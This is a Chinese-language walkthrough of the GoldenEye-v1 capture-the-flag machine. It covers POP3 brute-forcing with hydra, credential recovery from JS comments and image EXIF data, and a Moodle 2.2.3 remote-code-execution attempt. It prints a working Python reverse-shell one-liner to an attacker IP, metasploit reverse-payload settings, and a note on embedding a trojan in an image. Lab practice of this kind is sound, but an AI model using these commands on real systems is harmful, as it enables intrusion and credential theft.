GoldenEye-v1靶机

信息收集，确认靶机IP，端口开放信息，网站的目录

有80端口，先看80，提示我们需要到 /sev-home/ 下进行身份认证

没思路，还是看网页源代码，发现其引入了一个 js 文件，查看此 js 文件，发现注释貌似中隐藏了密码， 似乎是进行了html实体化编码 依次进行解码。得出密码是 InvincibleHack3r

然后用Boris的用户名和上述密码登录，发现不行。之后通过别人的打靶记录才知道用户名开头的 B 得小写。进入之后，旁边有提示。大概意思是已将 pop3 服务配置为在非常高的非默认端口上运行。大概端口在50000+了，就是nmap扫出来的55007

如果不确定是Pop3我们还可以打开 msf 搜索pop3模块

我们使用第二个payload，去查询版本，版本一出来就能确定是否为pop3服务

显示其所使用的参数，设置好IP和端口，直接run，可见其确实有pop3服务在运行

查看网页源代码，发现注释中有类似账号用用户名的信息

Natalya
Boris

既然已经知道了账户名那我们现在就利用最高端口进行爆破，这里我们使用系统自带的字典进行爆破

hydra 192.168.221.151 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v

成功爆破出用户的账号密码

登录：Boris密码：secret1！

登录名：natalya密码：bird

然后使用 nc 工具登录pop3

列出所有邮件，用 retr 命令阅读邮件，在 natalya 的邮件内发现一个网站还给出了账号与密码，但访问时，需要将 IP 与域名绑定一起。

用邮件里给的账号密码进行登录

用户名：xenia

密码：RCP90rulez！

在账户的messages找到了一封邮件获得一个用户doak用户，在账户的messages找到了一封邮件其由doak用户发送给xenia。那么我们对 doak 进行 hydra 的爆破，得到密码：goat。查看其邮箱内有无其他信息。发现另一个登录的账号密码。

我看到messages信息是和管理员有联系的，这个moodle系统版本是2.2.3，在Myprivate files文件下有一个下载文件，我们下载看看。访问提示的这个路径/dir007key/for-007.jpg。

挺诡异的一张图

现在我们查看文件的内容，指出管理员凭据已隐藏在映像文件中，让我们在浏览器中打开图像以查看其内容。下载图片后，我们可以使用binwalk（路由逆向分析工具）、exiftool（图虫）、strings（识别动态库版本指令）等查看jpg文件底层内容。

我们下载一个exiftool

什么是EXIF

可交换图像文件格式常被简称为Exif（Exchangeable image file format），是专门为数码相机的照片设定的，可以记录数码照片的属性信息和拍摄数据。Exif 可以被附加在 JPEG、TIFF、RIFF 等文件之中，为其增加有关数码相机拍摄信息的内容和缩略图或图像处理软件的一些版本信息
安装 apt-get install exiftool
为一个图片生成图片码，图片码为我们的木马
exiftool poc.jpg -documentname=”“

使用exiftool明显发现有处 base64 加密的地方

解密后为 xWinter1995x!，应该为admin账号，登录成功，使用 moodle 2.2.3 框架，其在网上有RCE漏洞

pyload：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.221.132",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

在这个路径选着PspellShell

在这个路径添加POC并保存

然后，到下面页面点击红标处

但是不知道为什么不管用

使用msfconsole，其底层代码使用的是pspellshell。这里的网页使用的是Googleshell，导致没有办法去运行。所以我们跟上面一样改为pspellshell。

还是一样，显示搜索moodle模块，发现一个远程命令执行

查看参数并设置，但是登录失败，很抽象，重启试了好多次都失败了

set username admin
set password xWinter1995x!
set rhosts severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 192.168.221.132

在这里留个坑